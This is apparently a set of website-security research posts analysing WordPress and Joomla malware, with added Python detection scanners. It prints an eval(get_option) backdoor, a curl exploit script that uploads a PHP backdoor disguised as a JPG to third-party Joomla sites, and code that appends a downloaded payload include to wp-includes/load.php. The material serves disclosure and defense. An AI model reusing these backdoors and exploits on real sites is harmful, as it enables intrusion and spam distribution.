Minimalistic WordPress injection

WordPress-specific malware is slightly different from generic PHP malware. Inside WordPress files, it can use the WordPress API and the WordPress database. This allows injections like the following:

<?php eval(get_option("\x72\x65\x6e\x64\x65\x72")); ?>

It was found in WordPress theme files. The code executes the value of the "render" option (the name is deobfuscated here) from the WordPress wp_options table, which it retrieves using the get_option WordPress API function.

This piece of code can be used both as a backdoor (say, to execute arbitrary code passed in a certain request parameter) and to inject client-side malware (it was found right after the tag in theme files). We actually found the "render" option in the database, but by the time we began working on the site, that option had already been cleaned, so at this point we can't tell what exactly was there. If you find this malware and the original value of the render option on your site, please let us know at labs@sucuri.net.
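As an added example (not code from Sucuri or from the malware), here is a small scanner that finds eval(get_option(...)) calls in theme files and resolves PHP's double-quoted escape sequences so the hex-obfuscated option name ("\x72\x65\x6e\x64\x65\x72") is reported in clear text. The directory layout it walks and the sample theme file it embeds are assumptions made for the demonstration.

```python
import os
import re

# One PHP double-quoted-string escape: \xHH, \OOO (octal), or a simple escape such as \n or \"
_PHP_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\([nrtv\\"$])')
_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "\\": "\\", '"': '"', "$": "$"}


def decode_php_string(raw):
    """Resolve the escape sequences PHP honours inside a double-quoted string literal."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8))
        return _SIMPLE_ESCAPES[m.group(3)]
    return _PHP_ESCAPE.sub(repl, raw)


# eval( get_option( "<literal>" ) ) with either quote style and arbitrary whitespace
_EVAL_GET_OPTION = re.compile(r'eval\s*\(\s*get_option\s*\(\s*(["\'])(.*?)\1', re.DOTALL)


def find_eval_get_option(source):
    """Return the (deobfuscated) option names that `source` passes to eval(get_option(...))."""
    names = []
    for quote, raw in _EVAL_GET_OPTION.findall(source):
        # Single-quoted PHP strings only know \\ and \', so their contents are already literal
        names.append(decode_php_string(raw) if quote == '"' else raw)
    return names


def scan_theme_dir(root):
    """Walk a directory tree (e.g. wp-content/themes) and map each PHP file to the option names it evals."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_eval_get_option(fh.read())
            if hits:
                findings[path] = hits
    return findings


# Constructed sample: the injection from the post plus a benign get_option() call that must not match
SAMPLE_THEME_FILE = (
    '<?php eval(get_option("\\x72\\x65\\x6e\\x64\\x65\\x72")); ?>\n'
    '<?php echo esc_html(get_option("blogname")); ?>\n'
)

if __name__ == "__main__":
    print(find_eval_get_option(SAMPLE_THEME_FILE))  # ['render']
```

Once the option name is known, the option's value in wp_options is the payload to preserve for analysis before cleaning; the scanner deliberately reports only the name and never evaluates anything it finds.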

Hacked Sites Help Hack Third-Party Sites

Just a reminder that your hacked site may be used to anonymously hack third-party sites.

This Joomla com_Myblog exploit script was found on one hacked site:

$uploadfile="tq.php.jpg";
$ch = curl_init("http://<third-party-site.com>/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

This code uploads a PHP backdoor disguised as a JPG file using a vulnerability in a really old (and, it looks like, no longer supported) My Blog Joomla component.

Still, some webmasters use it on Joomla 1.5.x sites, and this exploit has proven to be efficient, as you can read in this blogpost. That blogpost also provides a quick fix for this vulnerable component. Apply it if you still use legacy versions of this component, but also consider upgrading your site to software that is up to date (both Joomla and third-party components, plugins and templates).
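The upload in the script above works because a file named tq.php.jpg is accepted as an image. As an added example (not part of the original post or of any Joomla component), the following server-side check flags uploads that look like PHP dressed up as an image: a double extension with an executable suffix before the last one, an image extension without an image header, or a PHP open tag anywhere in the content. The list of executable extensions is an assumption about a typical Apache/PHP handler configuration.

```python
import re

# Extensions a PHP-enabled web server may execute; which ones actually run depends on the
# server's handler configuration (assumption: a typical Apache/PHP setup)
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def extension_parts(name):
    """All dot-separated suffixes of a file name, lower-cased: tq.php.jpg -> ['php', 'jpg']."""
    return name.lower().split(".")[1:]


def image_type(data):
    """Identify an image by its leading magic bytes, or None if no known header is present."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def classify_upload(name, data):
    """Return the reasons an upload looks like PHP dressed up as an image; an empty list means clean."""
    reasons = []
    parts = extension_parts(name)
    if parts and parts[-1] in EXECUTABLE_EXTS:
        reasons.append("executable extension")
    if any(p in EXECUTABLE_EXTS for p in parts[:-1]):
        reasons.append("executable extension hidden before the final one")
    if parts and parts[-1] in IMAGE_EXTS and image_type(data) is None:
        reasons.append("image extension without an image header")
    if PHP_OPEN_TAG.search(data):
        reasons.append("PHP open tag inside the file")
    return reasons


if __name__ == "__main__":
    # Constructed sample: the file name from the exploit script with harmless PHP content
    print(classify_upload("tq.php.jpg", b"<?php echo 'hello'; ?>"))
```

A polyglot (valid image header followed by PHP) passes the first two checks and is caught only by the content scan, which is why the three checks are combined rather than relied on individually; storing uploads outside the web root, or with script execution disabled for that directory, removes the risk regardless of file name.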

Tag-cloud-generator com script redirects to parked domains

Today we found a few websites that loaded strange code from tag-cloud-generator[.]com.

Sites tried to load several image and font files from this domain, but they all returned 404 Not Found. The only live file they loaded was hxxp://www.tag-cloud-generator[.]com/js/fx2.js or its pseudo-localized copies like hxxp://www.tag-cloud-generator[.]com/NL/js/fx2.js, hxxp://www.tag-cloud-generator[.]com/EN/js/fx2.js, hxxp://www.tag-cloud-generator[.]com/FR/js/fx2.js, etc.

The fx2.js file contains an encrypted script that loads (randomly) one of the following scripts:

hxxp://www.tag-cLoud-generator[.]com/b01.js
hxxp://www.tag-cLoud-generator[.]com/b02.js
hxxp://www.tag-cLoud-generator[.]com/b03.js
hxxp://www.tag-cLoud-generator[.]com/b04.js

Those scripts, in turn, redirect visitors to one of the following parked domains with ads:

www.rusoen[.]com
www.askinz[.]com
www.ad-u[.]com
www.kinkyfirehouse[.]com

Using code like this:

JavaScriptRedirectURL="http://www.ad-u[.]com/";window.top.location.href=JavaScriptRedirectURL;

All these domains, including tag-cloud-generator[.]com are registered in China. If you ever used tag-cloud-generator, make sure to remove it from your site. We will share more information if we find anything new.

Fake Social Share WordPress Plugin Creates Pharma Spam...

We found infected sites where malware created a fake WordPress plugin that generated pharma spam doorways.

Path: wp-content/plugins/social-share/wp-social-share.php

This file creates wp-content/plugins/social-share/share.php, which calls itself "WP Social Include File". It downloads a doorway generator from hxxp://api-linux[.]net/json/json_01.txt, writes it into wp-content/mu-plugins/mu-plugin.png and then includes this file at the bottom of wp-includes/load.php:

...
$load = '@include_once ( ABSPATH . \'wp-content/mu-plugins/mu-plugin.png\' );';
if(strpos(@file_get_contents($path."/../wp-includes/load.php"), $load) === false){
@file_put_contents($path."/../wp-includes/load.php", $load, FILE_APPEND);}
...

The doorway generator uses the following URLs:

...
$processor = 'jp.apigenerator.net';
$server_door = 'hxxp://'.$processor.'/avtonom/comeon_door.php';

$url_new = $processor;
$path_new = '/avtonom/comeon_door.php';

$buypage = 'hxxp://solarkey .net/notds/gettheme_ss_incl.php';
$buy_url = 'solarkey.net';
$buy_path = '/notds/gettheme_ss_incl.php';
...
$linksurl = 'http://jp.apigenerator.net/avtonom/getlinks_003.php';
$linksurl_url = 'jp.apigenerator.net';
$linksurl_path = '/avtonom/getlinks_003.php';
...

Some of the above URLs should only be accessed with a special User-Agent string:

$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6";

If you are a hosting provider, we recommend blocking HTTP requests to these external sites, to stop the spam doorways from being distributed. We will share more details as we learn more about it.
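Two traits of this infection are easy to check for mechanically: a core file (wp-includes/load.php) that has had a line appended to it, and an include of a non-.php file (mu-plugin.png) from the mu-plugins directory. The following is an added example, not Sucuri's tooling or any WordPress code; the pristine load.php stand-in is a constructed placeholder, and in practice the comparison is made against the file from the same WordPress release.

```python
import re

# include/require of a quoted literal path, optionally prefixed with "ABSPATH ." and an @ silencer
_INCLUDE = re.compile(
    r"@?\b(include_once|include|require_once|require)\b\s*\(?\s*"
    r"(?:ABSPATH\s*\.\s*)?(['\"])([^'\"]+)\2"
)


def suspicious_includes(source):
    """Return the paths a PHP source includes that do not end in .php (such as a .png in mu-plugins)."""
    return [path for _kw, _quote, path in _INCLUDE.findall(source)
            if not path.lower().endswith(".php")]


def appended_tail(known_good, current):
    """If `current` is `known_good` with extra text appended (the FILE_APPEND pattern), return that text."""
    if current.startswith(known_good) and len(current) > len(known_good):
        return current[len(known_good):]
    return None


def odd_mu_plugin_files(names):
    """mu-plugins only auto-loads *.php; anything else sitting there (e.g. mu-plugin.png) deserves a look."""
    return [n for n in names if not n.lower().endswith(".php")]


# Constructed samples: a stand-in for a pristine wp-includes/load.php and the line the malware appends
PRISTINE_LOAD_PHP = "<?php\n/* core code */\nfunction wp_load_stub() {}\n"
APPENDED_LINE = "@include_once ( ABSPATH . 'wp-content/mu-plugins/mu-plugin.png' );"

if __name__ == "__main__":
    infected = PRISTINE_LOAD_PHP + APPENDED_LINE
    print(appended_tail(PRISTINE_LOAD_PHP, infected))   # the appended include line
    print(suspicious_includes(infected))                 # ['wp-content/mu-plugins/mu-plugin.png']
    print(odd_mu_plugin_files(["mu-plugin.png", "helper.php"]))  # ['mu-plugin.png']
```

The same file-integrity idea is what WP-CLI's `wp core verify-checksums` automates against the official release checksums; the include scan complements it by catching the mu-plugins hook even when the appended line has been moved into a file that is not part of core.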

Chinese Doorway Spam – P2

We are seeing an increasing number of hacked sites with Chinese doorways promoting various fake merchandise (from Louis Vuitton handbags to NFL jerseys and Canada Goose jackets).

Those doorways target both Western and Chinese web searches. Here's how they make sure the doorway correctly preserves search queries in Chinese (converting from UTF-8 to gb2312) when they work with the Google search referrer string:

if (empty($_SERVER['HTTP_REFERER'])) {
    $HTTP_Referer = "n";
} else {
    $temp = urldecode($_SERVER['HTTP_REFERER']);
    if (strpos($_SERVER['HTTP_REFERER'], 'ie=utf-8') !== false) {
        $temp = mb_convert_encoding($temp, 'gb2312', 'utf-8'); //utf-8->gb2312

    }
    $HTTP_Referer = strtolower($temp);
}

Since Google uses ie=utf-8 by default for most languages, queries containing non-ASCII characters that are not Simplified Chinese will be garbled. Apparently they are only interested in English and Chinese queries.
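To make the garbling concrete, here is an added Python stand-in for the PHP snippet above (it is not the doorway's code and not Sucuri's): it applies the same urldecode, conditional re-encoding to gb2312 and byte-wise lower-casing, then extracts the q= parameter the way the doorway would read it. The two sample referrers, a Simplified Chinese query and a Korean one, are constructed for the demonstration; Korean is used because Hangul has no gb2312 mapping, so it shows the loss the post describes.

```python
from urllib.parse import parse_qs, quote, unquote, urlsplit


def convert_referrer(referer):
    """Python stand-in for the doorway's PHP referrer handling: urldecode, re-encode to gb2312
    when the referrer advertises ie=utf-8, then lower-case ASCII letters (PHP strtolower is byte-wise).
    Returns the bytes the doorway goes on to inspect."""
    if not referer:
        return b"n"
    temp = unquote(referer)
    if "ie=utf-8" in referer:
        # mb_convert_encoding substitutes characters gb2312 cannot represent; '?' mirrors that
        return temp.encode("gb2312", errors="replace").lower()
    return temp.encode("utf-8").lower()


def referrer_query(converted):
    """Recover the q= parameter from the converted bytes, decoding them the way the doorway would (gb2312)."""
    url = converted.decode("gb2312", errors="replace")
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


# Constructed sample referrers: a Simplified Chinese query and a Korean one, both sent as UTF-8
SAMPLE_ZH = "https://www.google.com/search?q=" + quote("手机") + "&ie=utf-8"
SAMPLE_KO = "https://www.google.com/search?q=" + quote("전화") + "&ie=utf-8"

if __name__ == "__main__":
    print(referrer_query(convert_referrer(SAMPLE_ZH)))  # 手机 survives the round trip
    print(referrer_query(convert_referrer(SAMPLE_KO)))  # ?? : the Korean query is lost
```

The conversion is lossy by design of the target charset: anything the doorway's keyword matching does not need is simply replaced, which is why a Chinese-language doorway on a site that otherwise serves, say, Korean or Japanese visitors will never match those queries.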

Double hidden style – Hiding spam

We see many tricks that hackers use to make search engine bots think that injected spam is not hidden. One of the common approaches is to place the spam block inside a div with a particular id or class and then add a JavaScript call that makes that div invisible.

And the newest form of the "unlocked iPhone" spam injection tried something new (which also made us smile). It uses elementary-school-level math to make the spammy div's id and the id used in the JavaScript look different.

Here's the typical code:

<div id="232">...spammy content here...</div><script>document.getElementById (116*2) .style.display='none';</script>

The idea is simple: the malware generates a random number (say n), doubles it and uses the result as the spam div's id. In the JavaScript code, it uses the same multiplication expression verbatim as the getElementById(n*2) parameter, which works because JavaScript implicitly converts the number to a string.
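A signature that looks for getElementById("232") next to id="232" misses this trick, so a detector has to resolve the arithmetic the way the browser would. As an added example (not code from the post or from Sucuri), the scanner below extracts the argument of every getElementById(...).style.display='none' call, evaluates it with a small whitelist-based arithmetic evaluator (numbers and + - * / only, no names or calls), applies JavaScript's number-to-string rule, and reports any match against a numeric div id in the same page. The page sample is the one from the post; handling of nested parentheses in the argument is deliberately left out.

```python
import ast
import operator
import re

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def eval_arith(expr):
    """Evaluate a JS arithmetic literal expression such as 116*2 safely (numbers and + - * / only)."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        raise ValueError("unsupported expression: %r" % expr)
    return walk(ast.parse(expr, mode="eval").body)


# getElementById( <arg> ).style.display = 'none'; the argument may not itself contain parentheses
_HIDE_CALL = re.compile(
    r"getElementById\s*\(\s*([^)]+?)\s*\)\s*\.\s*style\s*\.\s*display\s*=\s*['\"]none['\"]")
_DIV_ID = re.compile(r"<div\b[^>]*\bid\s*=\s*['\"]?(\d+)['\"]?", re.IGNORECASE)


def js_id_value(arg):
    """Return the id string a JS getElementById(arg) call resolves to, for a quoted literal or arithmetic."""
    arg = arg.strip()
    if len(arg) >= 2 and arg[0] == arg[-1] and arg[0] in "'\"":
        return arg[1:-1]
    value = eval_arith(arg)
    # JS converts a whole number to a string without a decimal point: 232.0 -> "232"
    return str(int(value)) if float(value).is_integer() else str(value)


def find_hidden_numeric_divs(html):
    """Pair each display='none' call with the numeric div id it resolves to, as (id, js_argument)."""
    ids = set(_DIV_ID.findall(html))
    hits = []
    for arg in _HIDE_CALL.findall(html):
        try:
            target = js_id_value(arg)
        except (ValueError, SyntaxError):
            continue
        if target in ids:
            hits.append((target, arg.strip()))
    return hits


# The sample from the post (spam text replaced by a placeholder)
SAMPLE_HTML = ('<div id="232">...spammy content here...</div>'
               "<script>document.getElementById (116*2) .style.display='none';</script>")

if __name__ == "__main__":
    print(find_hidden_numeric_divs(SAMPLE_HTML))  # [('232', '116*2')]
```

Because the evaluator only accepts numeric literals and four operators, a getElementById argument that references a variable or a function call raises and is skipped rather than executed, which keeps the scanner safe to run over untrusted pages.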